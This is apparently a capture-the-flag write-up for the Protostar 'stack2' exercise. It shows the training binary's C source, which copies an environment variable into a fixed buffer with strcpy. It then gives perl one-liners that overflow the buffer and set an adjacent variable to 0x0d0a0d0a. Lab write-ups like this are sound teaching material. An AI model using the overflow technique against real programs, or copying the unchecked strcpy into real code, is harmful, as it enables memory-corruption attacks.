Introduction

Protostar exploits are a cool bunch of ctf type exercises that focus on Linux  binary exploits that progressively get harder. A ISO containing the OS and challenges can be downloaded.

The website with all information and downloads is at https://exploit-exercises.com/protostar/

Challenge

Test run

user@protostar:~$ /opt/protostar/bin/stack2
stack2: please set the GREENIE environment variable

Exploit

Make the program respond with the message “you have correctly modified the variable”.

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
 volatile int modified;
 char buffer[64];
 char *variable;

 variable = getenv("GREENIE");

 if(variable == NULL) {
 errx(1, "please set the GREENIE environment variable\n");
 }

 modified = 0;

 strcpy(buffer, variable);

 if(modified == 0x0d0a0d0a) {
 printf("you have correctly modified the variable\n");
 } else {
 printf("Try again, you got 0x%08x\n", modified);
 }

}

We can see the challenge statement will be displayed if the ‘modified’ variable is equal to the hex value “0x0d0a0d0a”.

First of we have to use the same trick from challenge stack0 and corrupt the memory stack but this time using the “GREENIE” environment variable which gets pasted to strcpy() call and overwrite the “modified” variable. Will need to be reverse order so “CRLFCRLF”=0x0a0d0a0d.

Let’s see

user@protostar:~$ GREENIE=`perl -e 'print "A"x65'` && export GREENIE && /opt/protostar/bin/stack2
Try again, you got 0x00000041

Using perl we were able to overflow the buffer where ‘buffer’ variable was being stored. We wrote out 65 A’s to stdout and this was one byte more than was allocated and must have hit the ‘modified’ variable.

We appear to have hit one byte of modified with 0x41=A.

With some experimenting we are able to get the desired modified key.

user@protostar:~$ GREENIE=`perl -e 'print "A"x64 . "\x0a\x0d\x0a\x0d"'` && export GREENIE && /opt/protostar/bin/stack2
you have correctly modified the variable

Thank you